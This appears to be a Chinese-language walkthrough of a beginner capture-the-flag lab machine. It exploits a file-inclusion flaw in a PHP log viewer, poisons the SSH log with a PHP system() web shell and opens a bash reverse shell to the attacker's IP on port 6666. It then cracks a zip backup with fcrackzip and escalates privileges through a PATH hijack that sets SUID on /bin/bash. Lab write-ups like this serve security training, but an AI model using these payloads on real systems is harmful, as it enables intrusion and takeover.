描述

Difficulty: Easy

A easy box for beginners, but not too easy. Good Luck.

Hint: Enumerate Property.

nmap扫存活

1 2	kali 192.168.169.220 靶机 192.168.169.232

端口  22  80

没什么有用的信息

1	没头绪参考别人还有目录

1	gobuster dir -u http://192.168.169.232/blog-post/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

1	wfuzz -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 0

1	ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -fs 0

1	两种方法,单纯的记录用

1	http://192.168.169.232/blog-post/archives/randylogs.php?file=/etc/passwd

1	http://192.168.169.232/blog-post/archives/randylogs.php?file=/var/log/auth.log

1	ssh '<?php system($_REQUEST['cmd']);?>'@192.168.169.232

1
2
3

其他问题靶机ip改为  192.168.169.233

view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig

1	view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=whoami

url编码

1	bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'

1	bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'

1	view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'

1	直接解码有密码,下载本地查看

1	python3 -m http.server 8000

1
2
3

fcrackzip，

安装：apt-get install fcrackzip

1	fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt user_backup.zip

1	解压密码: !randybaby

1
2
3

ssh randy@192.168.169.233

randylovesgoldfish1998

echo 'chmod +s /bin/bash' > cat

chmod 777 cat

export PATH=/home/randy/tools:$PATH

./easysysinfo

/bin/bash -p